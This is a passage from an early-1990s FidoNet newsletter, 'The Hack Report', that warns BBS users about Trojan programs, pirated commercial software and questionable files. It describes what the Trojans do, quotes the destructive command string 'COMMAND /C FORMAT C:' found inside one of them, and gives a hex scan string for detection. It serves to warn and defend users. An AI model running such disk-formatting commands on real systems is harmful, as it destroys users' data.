As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
|
|
with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program. PASS.PA2
|
|
contains the single letter 'Y', and PASS.PA3 contains the single word
|
|
'Yes'. From the looks of things, this turns out to be a multipartite
|
|
Trojan that attempts to format (what else?) your hard drive.
|
|
|
|
|
|
Another multipartite Trojan was spotted by James Frazee (1:343/58), under
|
|
the filename ADD_IT. It contains these files:
|
|
|
|
Name of File Size Date
|
|
ADD_IT.ARJ 40888 02-11-93
|
|
=======================================
|
|
ADDIT1 DAT 34283 07-20-91 2:13a
|
|
ADD_IT ANS 646 02-11-93 8:31p
|
|
ADDIT2 DAT 20634 04-09-91 5:00a
|
|
ADDIT DOC 177 02-11-93 7:28p
|
|
ADDIT COM 1391 02-11-93 8:14p
|
|
ADDIT3 DAT 138 02-11-93 8:13p
|
|
THEDRAW PCK 650 02-11-93 8:31p
|
|
|
|
When run, ADDIT.COM merges the three .DAT files into an .EXE file. The
|
|
end result was that the program deleted all of the files in the directory
|
|
in which it was run.
|
|
|
|
|
|
John Balkunas (1:107/639) forwards information on GIFCHECK. He reports
|
|
that Lance Merlen (1:107/614) received an upload of this file, which,
|
|
when checked with McAfee's ViruScan v100, reported over 5 viruses in the
|
|
files in the archive. No internal archive data was provided, so it is
|
|
hard to say whether or not this is an isolated incident.
|
|
|
|
|
|
Zack Jones (1:151/173) reports a file called GAGS which was seen in the
|
|
San Antonio area. The file, described as "Some Christmas practical
|
|
jokes," was analyzed by Bill Dirks (1:385/17) and confirmed as a Trojan.
|
|
The program grabs control of several interrupt vectors, including the
|
|
critical error handler. The only way to stop it once it starts is to hit
|
|
the reset button or power down.
|
|
|
|
When invoked, it displays a countdown from 8 to 0, which corresponds to
|
|
drives H through A, in that order. For each found drive, it overwrites
|
|
the first 255 sectors with random data from a block of memory. To add
|
|
insult to injury, if drives B and A are empty, you are prompted to insert
|
|
disks (so that they can be trashed as well).
|
|
|
|
After this, the Trojan displays the message, including something like,
|
|
"the disk was trashed but it's only a joke and they are only kidding."
|
|
It then prompts you to reboot, which is rather hard to do unless you have
|
|
a bootable "panic disk" floppy on hand - you certainly won't be able to
|
|
boot from your HD.
|
|
|
|
Bill says that if your HD is smaller than 60 megs, you're better off
|
|
trying to recover your disk from scratch. Between 60-120 megs, you have
|
|
a better chance of recovery via disk utilities: over 120 megs, you
|
|
should be able to accomplish a complete recovery if you're careful and
|
|
you know what you're doing.
|
|
|
|
Bill posted the following scan string that can be used to detect this
|
|
Trojan - if your scanner can use external strings, be sure to read the
|
|
instructions carefully before trying to add this:
|
|
|
|
9A46027205B003B9FF00BA0000CD26
|
|
|
|
If your scanner requires a name for the string, Bill suggests using
|
|
"AlamoXmasTrojan."
|
|
|
|
|
|
This Trojan report comes from an article in MacWeek magazine, Volume 7,
|
|
Number 2, issued January 11, 1993. The article, posted in the FidoNet
|
|
VIRUS_INFO echo by Robert Cummings, states that a program called CPro
|
|
1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
|
|
shareware compression utility), will reformat any floppy in drive 1 and
|
|
tries to reformat the user's start-up hard drive when launched.
|
|
|
|
The file can be identified by a 312K sound resource file called "log
|
|
jingle," which is digitized sound from the Ren and Stimpy cartoons.
|
|
|
|
|
|
Other previously reported Trojans:
|
|
|
|
Filename Claimed use/Actual activity/Reporter(s)
|
|
======== ==============================================================
|
|
AANSI100 Claims to add Auto-ANSI detect to Telegard BBSs - contains
|
|
something called the "Malhavoc Trojan," which displays a verse
|
|
from a Toronto band and attacks files/sectors on drives C:
|
|
through F:. Reported by HW Todd Clayton and by George Goode
|
|
(1:229/15).
|
|
|
|
ANSISCR VGA BBS ad - contains a self-extracting archive of the Yankee
|
|
Doodle and AntiChrist viruses. Can trash hard drives as well
|
|
through Trojan behaviour. Reported by Bill Dirks (1:385/17),
|
|
and under the filename RUNME by Stephen Furness (1:163/273).
|
|
|
|
AVENGER Advertised as an "amazing game that supports all kind of sound
|
|
cards...." Contains 2 internal password-protected .ZIP format
|
|
files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
|
|
the program to the files RUNTIME1.COM (N1 virus) and
|
|
RUNTIME2.COM (Anthrax virus). From Reinhardt Mueller, via
|
|
HW Bill Lambdin.
|
|
|
|
BATMAN No claim reported - searches your DOS path and tries to "delete
|
|
the executable file that loads WildCat BBSs." Reported by
|
|
James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.
|
|
|
|
CHROME Possible isolated incident - contains a file, FGDS.COM, which
|
|
contains text that says "Skism Rythem Stack Virus-808."
|
|
Reported by Richard Meyers and forwarded by Larry Dingethal
|
|
(1:273/231).
|
|
|
|
DBSOUND Possible isolated incident - claimed update of the Drum
|
|
Blaster .MOD file player. Deletes all files in the current
|
|
directory and all of its subdirectories. From "Khamsin #1
|
|
@9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
|
|
from Ken Green of the CentraLink BBS.
|
|
|
|
DRSLEEP Reported as a "cheap virii (sic)", but actually appears to be
|
|
a Trojan: deletes your COMMAND.COM file when run. Reported
|
|
by Matt Hargett (1:2430/1532).
|
|
|
|
GRAFIX Possible isolated incident - contains the file WAIT.COM, which
|
|
is a renamed copy of DELDIR.COM, a directory remover and file
|
|
deletion tool. Reported by Andreas Reinicke (2:284/402).
|
|
|
|
LOGIM613 Possible isolated incident - one internal file, MOUSE.COM,
|
|
reports as being infected with the VCL virus when checked with
|
|
McAfee's ViruScan v95. Reported by Mike Wenthold (1:271/47).
|
|
|
|
MUVBACK Claimed keyboard utility - actual ANSI bomb that remaps the D
|
|
key of your keyboard to invoke DEBUG and create a couple of
|
|
Trojans from script files. Reported by Bill Dirks.
|
|
|
|
OPTIBBS Aimed at RemoteAccess BBS systems - archives your USERS.BBS
|
|
list and places it in your download directory. Reported by
|
|
HW Nemrod Kedem.
|
|
|
|
QOUTES Not a misspelling - claimed Christmas quotation generator.
|
|
Overwrites the first 128 cylinders of your first HD, requiring
|
|
a low level format to overcome the damage (IDE drives may need
|
|
to go back to the factory). Reported by Gary Marden
|
|
(2:258/27).
|
|
|
|
QSCAN20 Claimed small virus scanner - when run, identifies itself as
|
|
"being a stealth bomber" and attacks your hard drive's FAT.
|
|
Reported by Art Mason (1:229/15).
|
|
|
|
RA111TO2 Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
|
|
the OPTIBBS file reported above. Reported by Peter Janssens
|
|
(2:512/1).
|
|
|
|
RAFIX "Fixes little bugs" in RemoteAccess - program contains the
|
|
string "COMMAND /C FORMAT C:" internally. Reported by Sylvain
|
|
Simard (1:242/158).
|
|
|
|
RAMANAGE Claimed USERS.BBS manager for RemoteAccess - yet another
|
|
file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
|
|
and places it in a download directory. Reported by Peter
|
|
Janssens.
|
|
|
|
NOTE - Peter Hoek (2:281/506.15) reports a program that does
|
|
the same thing, but uses the archive name RUNNING.ARJ to
|
|
hold the USERS.BBS file. No name of the Trojan was supplied.
|
|
|
|
REAPER ANSI bomb - remaps the keyboard to force file deletion and
|
|
hard disk formatting - also generates insults. Reported by
|
|
Victor Padron (1:3609/14), via Rich Veraa (1:135/907).
|
|
|
|
REDFOX Batch file which deletes all DOS and system files. Reported
|
|
by Mike Wenthold.
|
|
|
|
ROLEX Possible isolated incident of an infection by the Keypress
|
|
[Key] virus. Reported by David Gibbs, via Michael Toth
|
|
(1:115/220).
|
|
|
|
SCOMP Advertised as a compression utility. Passes scans unless you
|
|
check data files - loads a file called SCOMP.DAT to create
|
|
CASPER.COM, which is apparently the Casper virus. Reported by
|
|
Terry Goodman (U'NI Net virus conference), via HW Bill Lambdin.
|
|
|
|
SBBSFIX Tries to format drive C: - contains two files, SBBSFIX.EXE and
|
|
COM_P.OVL. Reported by Clayton Mattatall (1:247/400).
|
|
|
|
SPEED Claims to "check your PC speed" - actually deletes all files
|
|
on drive C:, including directories. Reported by HW Nemrod
|
|
Kedem.
|
|
|
|
TDRAW460 A "modified" copy of a legitimate release of TheDraw v4.60 -
|
|
the archive had a ZIP Comment which contained an ANSI bomb, and
|
|
an internal file called UFO!.COM would reformat your hard drive
|
|
unconditionally. Reported by Matt Glosson, via Michael Toth
|
|
(1:115/439.7).
|
|
|
|
XYPHR2 No claim - contains the Power Pump companion virus (documented
|
|
in the 1992 Full Archive of this report). Reported by Mark
|
|
Histed (1:268/332).
|
|
|
|
YPCBR101 A copy of this file, uploaded to Simtel-20 and the oak mirror
|
|
on archie.au, contained an infection of the Dark Avenger
|
|
virus in the file YAPCBR.EXE. Was supposed to be re-released
|
|
as a clean archive. Reported by John Miezitis (Internet,
|
|
John.Miezitis@cc.utas.edu.au).
|
|
|
|
=========================================================================
|
|
|
|
Pirated Commercial Software
|
|
|
|
Program Archive Name(s) Reported By
|
|
======= =============== ===========
|
|
2400 A.D. (game) 2400AD Kevin Brott (Internet,
|
|
dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
|
|
|
|
3-D Pool 3DPOOL Michael Gibbs (via HW Bill
|
|
Lambdin)
|
|
|
|
4DOS v4.02 (reg.) 4DOS402R HW Scott Raymond
|
|
4DOSREG
|
|
|
|
Airball (game) AIRBALL Michael Gorse (1:101/346)
|
|
|
|
Alone in the Dark ALONEDEM Mark Mistretta (1:102/1314)
|
|
(full game-not a demo)
|
|
|
|
ArcMaster (registered) AM91REG HW Scott Raymond
|
|
AM92REG
|
|
|
|
Arctic Fox (game, by AFOX from the Meier/Morlan List,
|
|
Electronic Arts) conf. by HW Emanuel Levy
|
|
and Brendt Hess (1:105/362)
|
|
|
|
ARJ Archiver ARJ239RG HW Scott Raymond
|
|
(registered) AJ241ECR
|
|
|
|
Arkanoid II: Revenge ARKNOID James Crawford (1:202/1809)
|
|
of DoH (game)
|
|
|
|
Atomix (game) ATOMIX_ HW Matt Kracht
|
|
|
|
A-Train by Maxis ATRAIN1 through Chris Blackwell of Maxis
|
|
ATRAIN6, also (zoinks@netcom.com)
|
|
A-TRAIN1 through
|
|
A-TRAIN6
|
|
|
|
BannerMania BANMANIA Harold Stein (1:107/236)
|
|
|
|
Battle Chess CHESS Ron Mahan (1:123/61)
|
|
| BTLCHESS Michael Wagoner (1:105/331)
|
|
|
|
BeetleJuice (game) BEETLE Mark Harris (1:121/99)
|
|
BETLEJUC Jason Robertson (1:250/802.2)
|
|
BJUICE Alan Hess (1:261/1000)
|
|
BJ Bill Blakely
|
|
(RIME Shareware echo)
|
|
BTLJWC the Hack Squad
|
|
(1:124/4007)
|
|
|
|
Big Bird (game?) BIGBIRD Cindy McVey, via Harold Stein
|
|
|
|
Budokan: the Martial BUDOKAN Michael Gibbs (Intelec, via
|
|
Spirit (game) HW Bill Lambdin)
|
|
|
|
Caveman Ninja CAVEMAN Dave Lartique (1:3800/22),
|
|
ver. by HW Emanuel Levy
|
|
|
|
Check-It PC CHECKIT HW Bert Bredewoud
|
|
Diagnostic Software CHKIT20 HW Bill Lambdin
|
|
|
|
Cisco Heat (game) CISCO Jason Robertson
|
|
|
|
Commander Keen Pt. 5 _1KEEN5 Scott Wunsch (1:140/23.1701)
|
|
KEEN5E Carson Hanrahan (CompuServe,
|
|
71554,2652)
|
|
|
|
{COMMO} v5.4 COMO54X Allan Bowhill (1:343/555)
|
|
|
|
CompuShow GIF Viewer CSHW860B HW Scott Raymond
|
|
|
|
Copy II PC COPYPC70 Ryan Park (1:283/420)
|
|
|
|
Cyber Chess C-CHESS Shane Paul, RIME, via HW
|
|
Richard Steiner
|
|
|
|
Darkside (game) DARKSIDE Ralph Busch (1:153/9)
|
|
|
|
Disk Copy Fast 4.0 DCF4UNT HW Scott Raymond
|
|
| (registered) DCF41AR
|
|
|
|
DiskDupe Pro v4.03 DD403PRO Jan Koopmans (2:512/163)
|
|
|
|
Energizer Bunny Screen ENERGIZR Kurt Jacobson, PC Dynamics,
|
|
Saver for Windows Inc., via HW Bill Dennison
|
|
|
|
F-Prot Professional FP206SF Mikko Hypponen
|
|
(mikko.hypponen@compart.fi)
|
|
|
|
Family Feud (game) FAM-FEUD Harold Stein
|
|
|
|
FAST! Disk Cache FAST_1V4 Ryan Park (1:283/420), via
|
|
v4.03.08 HW Bill Lambdin
|
|
|
|
| FaxTalk (Thought FAXTALK Lyle Taylor (1:293/644),
|
|
| Communications) via Steve Fuqua
|
|
|
|
| FaxPlus (Thought FAXPLUS Lyle Taylor (1:293/644),
|
|
| Communications) via Steve Fuqua
|
|
|
|
FaxPower FAXPWR Carson Hanrahan (CompuServe,
|
|
71544,2652)
|
|
|
|
| Freddy Pharkas, FREDDY-1 HW Bob Seaborn
|
|
| Frontier Pharmacist FREDDY-2
|
|
| FREDDY-3
|
|
| FREDDY-4
|
|
| FREDDY-5
|
|
| FREDDY-6
|
|
|
|
GEcho Mail Tosser GE_1000K HW Scott Raymond
|
|
GE_100CK
|
|
|
|
GifLite 2.0 (regist.) GL2-ECR HW Scott Raymond
|
|
|
|
Gods (game) GODS Ron Woods (1:134/144)
|
|
|
|
Golden Axe (game) GOLDAXE Harold Stein
|
|
|
|
GSZ Protocol Driver GSZ0503R HW Scott Raymond
|
|
(registered) GSZ0529R
|
|
|
|
Home Lawyer HOMELAWY Kim Miller (1:103/700)
|
|
HMLAWYER Harvey Woien (1:102/752)
|
|
|
|
| Hoyle's Classic Games HOYLECL1 HW Bob Seaborn
|
|
| HOYLECL2
|
|
| HOYLECL3
|
|
| HOYLECL4
|
|
|
|
HS/Link Protocol HS121R Don Becker (Internet,
|
|
v1.21 (registered) grendel@jaflrn.linet.org)
|
|
HS121REG HW Scott Raymond
|
|
|
|
HyperWare Speedkit SPKT460R HW Scott Raymond
|
|
v4.60 (registered)
|
|
|
|
Ian Bothams Cricket IBCTDT Vince Sorensen (1:140/121)
|
|
|
|
Intelcom Modem Test TESTCOM from the Meier/Morlan List,
|
|
Utility (dist. with confirmed by Onno Tesink
|
|
Intel modems) (RIME, via HW Richard
|
|
Steiner)
|
|
| INTELCOM HW Jason Robertson
|
|
|
|
| Intermail Mailer IM221U HW Scott Raymond
|
|
| (registered) IM22FIX
|
|
|
|
Jetsons (game) JETSONS Kevin Brott (Internet,
|
|
dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
|
|
|
|
Jill of the Jungle JILL2 Harold Stein
|
|
(non-shareware files) JILL3
|
|
$JILL2 HW Bert Bredewoud
|
|
$JILL3
|
|
|
|
Killing Cloud (game) CLOUD Mike Wenthold
|
|
|
|
Kings of the Beach VBALL Jason Robertson
|
|
(game)
|
|
|
|
Landmark System SPEED330 Larry Dingethal (1:273/242)
|
|
Speed Test SPEED600 Joe Morlan (1:125/28)
|
|
|
|
Life & Death (game) L&D1 Harold Stein
|
|
L&D2
|
|
|
|
List Enhanced LIST8 Richard Dale (1:280/333)
|
|
LISTE18D HW Scott Raymond
|
|
|
|
MegaMan (game) MEGAMAN HW Emanuel Levy
|
|
|
|
Microsoft Flight FS Michael Gibbs (Intelec, via
|
|
Simulator HW Bill Lambdin)
|
|
| FS50TDT1 HW Bob Seaborn
|
|
| FS50TDT2
|
|
|
|
| Microsoft Mouse Driver MOUSE901 Alex Morelli (CompuServe,
|
|
| 75050,2130)
|
|
|
|
Microsoft Ramdrive RAMDRIVE Barry Martin (Intelec, via
|
|
HW Bill Lambdin)
|
|
|
|
|
|
MS-DOS 6.0 MSDOS6-1 Harold Stein
|
|
MSDOS6-2
|
|
MSDOS6-3
|
|
|
|
|
|
Oh No, More Lemmings ONMLEMM Larry Dingethal (1:273/231)
|
|
(complete-not demo)
|
|
|
|
Over the Net OTNINC1 Tim Sitzler (1:206/2708)
|
|
(volleyball game)
|
|
|
|
PGA Tour Golf GOLF HW Bill Lambdin
|
|
|
|
PKLite (registered) PKL15REG HW Scott Raymond
|
|
|
|
PKZip v2.04c PK204REG HW Scott Raymond
|
|
(Registered)
|
|
|
|
PKZip v2.04c PKZCFG Mark Mistretta (1:102/1314)
|
|
Configuration Editor
|
|
|
|
PKZip v2.04e PK204ERG HW Scott Raymond
|
|
(Registered)
|
|
|
|
PKZip v2.04g PKZ204R HW Bill Dennison
|
|
(Registered) PKZ204GR HW Jason Robertson
|
|
|
|
Populous (game) POPULOUS Harold Stein
|
|
|
|
The Price is Right PRICE Harold Stein
|
|
(game)
|
|
|
|
Prince of Persia PRINCE Kenneth Darling (2:231/98.67)
|
|
Eric Alexander (1:3613/10)
|
|
HW Emanuel Levy
|
|
PRINCE2A Todd Crawford (1:3616/40),
|
|
PRINCE2B via HW Jeff White
|
|
PRINCE2C
|
|
|
|
PrintShop PSHOP Michael Gibbs, Intelec, via
|
|
HW Bill Lambdin
|
|
|
|
Psion Chess 3D-CHESS Matt Farrenkopf (1:105/376)
|
|
|
|
Pyro! PC DOSPYRO Jay Kendall (1:141/338), via
|
|
(Fifth Generation) HW Scott Raymond
|
|
|
|
Q387 (registered) Q387UTG Michael Toth (1:115/439.7)
|
|
|
|
QModem Pro QMPRO-1 Mark Mistretta
|
|
QMPRO-2
|
|
|
|
QuickLink II Fax v2.0.2 QLINK1 Carson Hanrahan (CompuServe,
|
|
QLINK2 71554,2652)
|
|
|
|
Rack 'Em (game) RACKEM Ruth Lee (1:106/5352)
|
|
|
|
Rawcopy PC RAWCOPY HW Chris Wise
|
|
|
|
Sequencer Plus Pro SPPRO Tom Dunavold (Intelec,
|
|
via Larry Dingethal)
|
|
|
|
Shadow Warriors (game) SHADOWG Mark Mistretta
|
|
|
|
Sharky's 3D Pool POOL Jason Robertson (1:250/801)
|
|
|
|
Shez (Registered) SHEZ84R Eric Vanebrick (2:291/712)
|
|
SHEZ85R HW Scott Raymond
|
|
SHEZ87R
|
|
SHEZ88R
|
|
SHEZ89R
|
|
| SHEZ91R
|
|
|
|
SideKick 2.0 SK3 Harold Stein
|
|
|
|
SimCity (by Maxis)* SIMCITY1 Peter Kirn, WildNet Shareware
|
|
SIMCITY2 conf., via HW Ken Whiton
|
|
SIMCITY3
|
|
SIM_CITY Kevin Brott (Internet,
|
|
dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
|
|
SIMCTYSW Scott Wunsch
|
|
|
|
Smartdrive Disk Cache SMARTDRV Barry Martin (Intelec, via
|
|
HW Bill Lambdin)
|
|
SMTDRV40 Michael Toth (1:115/220)
|
|
|
|
Spidey (game) SPIDEY Brian Henry (ILink,
|
|
via HW Richard Steiner)
|
|
SPIDRMAN Alan Hess (address unknown)
|
|
|
|
Squish 2.1 SQUISH Jason Robertson (1:250/802.2)
|
|
(Sundog Software) SQUISH21 Several (ver. by Joe Morlan)
|
|
|
|
Star Control Vol. 4 STARCON Carson M. Hanrahan
|
|
(CompuServe 71554,2652)
|
|
|
|
Streets on a Disk STREETS Harvey Woien
|
|
|
|
| SuperZModem SZMO200 HW Jason Robertson
|
|
| (registered)
|
|
|
|
Teledisk (files TDISK214 Mark Mistretta
|
|
dated after Apr. 1991)
|
|
TELE214R Staale Fagerland (Internet,
|
|
staale.fagerland@euronetis.no)
|
|
|
|
Telemate TM411REG HW Scott Raymond
|
|
|
|
TheDraw v4.61 (reg.) TDRW461R HW Scott Raymond
|
|
|
|
Vegas Casino 2 (game) VEGAS2 The Hack Squad
|
|
|
|
VOpt Disk Defragmenter VOPT30 The Hack Squad
|
|
|
|
VPic v6.0 (registered) VPIC60CR HW Scott Raymond
|
|
|
|
Wheel of Fortune WHEEL Harold Stein
|
|
|
|
Where in the USA is CARMEN Carson Hanrahan
|
|
Carmen Sandiego? CARMENUS Cindy McVey, via Harold Stein
|
|
|
|
Where in Time is CARMENT Cindy McVey, via Harold Stein
|
|
Carmen Sandiego?
|
|
|
|
WinWay Resume for WINRES Erez Carmel (CompuServe,
|
|
Windows 70523,2574)
|
|
|
|
World Class Rugby WCRFNTDT Vince Sorensen
|
|
|
|
ZipMaster (registered) ZM31REG HW Scott Raymond
|
|
|
|
|
|
* - Peter Kirn's report on SimCity indicated that Maxis has in fact
|
|
released a demo of SimCity onto ZiffNet which limits play to 5 minutes.
|
|
This is not the same file as he reported, however - the ones he found are
|
|
indeed pirate copies.
|
|
|
|
=========================================================================
|
|
|
|
?????Questionable Programs?????
|
|
|
|
This section of The Hack Report is for the "misfits" - in other words,
|
|
files that are hacks, hoaxes, Trojans, or pirated, but either do not
|
|
quite fit into one of the main sections of the report or require more
|
|
explanation than the format of the appropriate section allows. The extra
|
|
material presented here is usually included for a good reason, so please
|
|
take the time to read at least the new entries quite carefully. Also, if
|
|
you have any input on any of the listed files, do not hesitate to send it
|
|
in to your Hack Squad.
|
|
|
|
|
|
Quite a few folks questioned a release of Vern Buerg's LIST calling
|
|
itself v7.8a. This one actually came down one of the file distribution
|
|
networks, if memory serves. However, in response to these inquiries,
|
|
your Hack Squad called up The Motherboard BBS, Mr. Buerg's home system.
|
|
On that system was posted the following bulletin:
|
|
|
|
================================
|
|
=== July 15: LIST78A.ZIP is bogus ===============================
|
|
================================
|
|
|
|
A beta test version of LIST 7.8a was uploaded to other systems by
|
|
mistake. It is not an official version, and it has bugs, e.g. the
|
|
mouse doesn't work.
|
|
|
|
A new version will be released next week. Those waiting for
|
|
registered copies will be sent their's first, then it will be posted
|
|
on VOR and CIS. The manual was dramatically updated and is now 54
|
|
pages with full color cover. We'll have some on the shelves at the
|
|
store next week.
|
|
|
|
So, this definitely qualifies as a "misfit" - it isn't a hack, hoax, or
|
|
Trojan - it's an accident.
|
|
|
|
|
|
Robert Jung's ARJ archiver has had a new release in non-beta form. The
|
|
legitimate file can be identified by an ARJ-SECURED envelope. However,
|
|
making equally big news (unfortunately) were several sightings of pirated
|
|
versions of the registered v2.41 file. These were most often seen as a
|
|
ZIP file (?) with the following internal files:
|
|
|
|
Length Method Size Ratio Date Time CRC-32 Name
|
|
------ ------ ----- ----- ---- ---- -------- ----
|
|
1436 DeflatX 614 58% 06-09-93 16:05 23af995c README
|
|
223594 DeflatX 222850 1% 06-04-93 09:19 fe351d41 ARJ241.EXE
|
|
127882 Stored 127882 0% 06-04-93 09:27 54fdf489 ARJUTIL.ARJ
|
|
55301 DeflatX 54641 2% 06-04-93 09:18 6d4e75fe UNARJ241.EXE
|
|
244816 Stored 244816 0% 06-10-93 09:23 0abdb4be ARJHLP24.ARJ
|
|
------ ------ --- -------
|
|
653029 650803 1% 5
|
|
|
|
The giveaway here is the ARJUTIL.ARJ file - this contains programs that
|
|
are only available to registered users.
|
|
|
|
This causes a problem as far as listing this in the .col/.idx files is
|
|
concerned: the person who distributed the pirated version used the same
|
|
filename as the real thing. The only way you're going to be able to tell
|
|
the pirated version from the legitimate one will be to look inside your
|
|
copy of the archive. If you see either the ARJUTIL.ARJ file inside, or
|
|
the files ARJR.EXE or DEARJ.EXE, then you have the pirated copy. Please
|
|
delete it. (Note - version 2.41 has been superseded - please see the
|
|
Hacked Files section of this report for the latest version as of this
|
|
writing.)
|
|
|
|
|
|
Dotti Rosier (1:114/107) found a message on a local BBS system that might
|
|
be worth reading. The text read as follows:
|
|
|
|
WARNING: Nobody download PHACS1.EXE and NETWORK1.EXE..They have
|
|
the Yankee Doodle virus that is only detectable by SCANV99....
|
|
please clean these two exe files IMMEDIATELY and in case you
|
|
have run them already, there might b some other files that are
|
|
infected. CLEAN99 will clean them just fine. Sorry for the
|
|
inconvenience but I recently found out that my HD was infected
|
|
and therefore, every file that I compile is infected. Thank you
|
|
for your patience.
|
|
|
|
I can only assume that these were self extracting archives - no
|
|
descriptions of the files were available.
|
|
|
|
|
|
Steve Winter (1:153/7070) reported on a file called SUB1_V21. This
|
|
claimed to be a program called SUB, a directory list utility. Steve
|
|
checked out the file prior to running the install program and found no
|
|
anomalies. However, once installed, he says he began to get conflicting
|
|
directory reads, disk full errors, and problems booting. Somehow, his
|
|
boot record had been damaged.
|
|
|
|
According to his testing, the file passes scans with F-Prot v2.08a and
|
|
does not alert McAfee's VShield v104. He says the archive contains two
|
|
files - INSTALL.EXE and SUB.SPZ, which contains the executable. INSTALL
|
|
creates a subdirectory and extracts files from the SUB.SPZ file.
|
|
|
|
Steve says he is attempting to get another copy for testing. Until that
|
|
time, I can't say for sure if he was the victim of a system glitch, buggy
|
|
software, or a true Trojan. If anyone out there has this file, please
|
|
contact your local HackWatcher or myself so that we can arrange for
|
|
testing.
|
|
|
|
|
|
Mark Harris (1:121/26.1) found a pair of archives called DEATH_1 and
|
|
DEATH_2 on a local system. The files were described as a new Apogee game
|
|
called Deathbringer. The archives contained no documentation, and all
|
|
program files were dated 1990 or 1991. When run, the game displayed the
|
|
name "Deathbringer," but gave no company or copyright information. Scans
|
|
by McAfee's ViruScan and Frisk's F-Prot proved negative.
|
|
|
|
Mark has provided additional information that adds to the suspicion that
|
|
this is a pirated file. The program begins with the following screen:
|
|
|
|
Empire, in association with ODE and The Mystery Machine,
|
|
presents
|
|
-=*=- DEATHBRINGER -=*=-
|
|
Select Vidoe Mode:
|
|
|
|
1) VGA 16 color
|
|
2) EGA 16 color
|
|
3) Tandy 4 color
|
|
4) CGA 4 color
|
|
5) Tandy 16 color
|
|
|
|
Roland, Adlib and Tandy music supported
|
|
(Playing now, if found, M to toggle on/off)
|
|
J to select Joystick, K for keyboard
|
|
= to speed up, - to slow down game (fast PCs)
|
|
|
|
THOSE WHO LABOURED:
|
|
John Wood...................Atari ST, Commodore Amiga, Design
|
|
Kevin Ayre.....................................IBM PC, Design
|
|
Colin Swinbourne.....................................Graphics
|
|
Richard Yapp...................................Levels, Design
|
|
Sound Images............................................Music
|
|
|
|
Deathbringer, Karn and all Deathbringer Characters and the
|
|
distinctive likenesses thereof are Trademarks of Abaddon Duke of
|
|
Hell Group Inc.
|
|
|
|
|
|
Mark goes on to say:
|
|
|
|
There was no documentation in the archive (which I will
|
|
continue to hold on to, in case you need it for any reason)
|
|
giving any playing instructions, no shareware notice or
|
|
registration request, nothing whatsoever to indicate the origin
|
|
of this program except for the above. That's what prompted me
|
|
to write in the first place; it looks to me (especially
|
|
considering the quality of the graphics,) like this is a
|
|
commercial program with as much of the copyright and
|
|
identifying screens hacked out of it as possible.
|
|
|
|
As an Apogee Tech Support Specialist, I can personally verify that this
|
|
is not a product of Apogee. Mark's opinion is that this is a hack of a
|
|
commercial game: I tend to agree. Jim Wells (1:2613/261) forwarded the
|
|
file contents, along with some other information still being looked into:
|
|
he feels that this is a "hacked" version of the official release, whether
|
|
shareware or commercial. Rick McBride (1:363/178) says it is indeed
|
|
commercial, as he saw it on a CD-ROM about a year ago. However, he does
|
|
not remember the publisher's name (possibly Psygnosis, he says) - only
|
|
that it is an arcade-style D&D game.
|
|
|
|
This is still being researched. In the meantime, I would appreciate any
|
|
information that a user of the possible commercial version could forward
|
|
- please help your Hack Squad verify this one.
|
|
|
|
|
|
Chuck Cypert (1:124/2113) reported in the FidoNet VIRUS_INFO echo that
|
|
the SysOp of the CompUSA BBS in Carrollton, TX had a problem with a file
|
|
called UNIXHAC. The SysOp reports that this file formatted his hard
|
|
drive. No further details were available, as the SysOp had already
|
|
deleted the file. If someone has a copy of this, again, please contact
|
|
one of The HackWatchers or myself.
|
|
|
|
|
|
| Harvey Woien (1:102/752) forwarded a report from a user of The
|
|
| Motherboard (Vern Buerg's BBS), Ted R. Marcus, about a version of the
|
|
| Microsoft Mouse Driver claiming to be version 9.0. It also appears that
|
|
| this file came down a file distribution network under the filename
|
|
| MSMAUS90, possibly originating in Germany. Your Hack Squad has found a
|
|
| copy of the same archive Ted reported on, and confirms some of his
|
|
| observations on the file (MOUSE900), quoted here:
|
|
|
|
|
| 1. Microsoft Diagnostics and InfoPlus report this "9.00" driver as
|
|
| version 8.00. The latest "official" version of which I am aware is
|
|
| 8.20a.
|
|
|
|
|
| 2. The "new" driver is significantly smaller than version 8.20a.
|
|
|
|
|
| 3. The "new" driver supports the undocumented /U switch (which loads
|
|
| much of the driver into the HMA). Version 8.0 and 8.1 supported this
|
|
| feature, but Microsoft removed it from version 8.2 (shipped with DOS
|
|
| 6.0). The support for the /U switch suggests that the driver is, in
|
|
| fact, version 8.0.
|
|
|
|
|
| 4. Examining the MOUSE.COM driver file reveals one instance where the
|
|
| version number (repeated in the initialization message for each
|
|
| language the driver supports) is "9.40". That indicates either
|
|
| uncharacteristic sloppiness on the part of Microsoft -- or, more
|
|
| likely, sloppiness on the part of a hacker.
|
|
|
|
|
| More information on MOUSE900 comes from Jeffery Bradley (1:3635/35). He
|
|
| informed the folks here at Hack Central Station that there is indeed a
|
|
| legitimate v9.0 of the Microsoft Mouse Driver. However, after talking
|
|
| with Microsoft, he did confirm that this should not be distributed via
|
|
| BBS systems: it is commercial only, as previously reported.
|
|
|
|
|
|
Yet another file that doesn't fit into any of the report categories: a
|
|
report from Wen-Chung Wu (1:102/342) concerns the archive PKLT120R, which
|
|
claims to be version 1.20 of PKLite. This is actually PKLite
|
|
Professional v1.12, a commercial product, which has been hacked to show
|
|
version 1.20 instead of 1.12. To make matters worse, the PKLITE.EXE file
|
|
was compressed "by PKLITE itself more than three times and once by
|
|
LZEXE." So, what we have here is a hack of a pirated commercial file -
|
|
jeez, this job gets confusing at times. ;-)
|
|
|
|
|
|
Here's an update on the report from Bud Webster (1:264/165.7) on the
|
|
Apogee game being distributed under the filename BLOCK5.ZIP. As reported
|
|
by Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
|
|
Stratton (via HW Ken Whiton), this program was part of an Apogee disk
|
|
called the "Super Game Pack," and that it is a game called "Block Five."
|
|
Joe Siegler (1:124/9006), the online support representative for Apogee
|
|
Software Productions, confirms this, and states that the majority of the
|
|
games on this disk, including this one, have been officially
|
|
discontinued. The official company stand is that this game should not be
|
|
distributed via BBS systems, as it is no longer supported in any way by
|
|
Apogee Software Productions. Thanks to everyone who helped on this one.
|
|
|
|
|
|
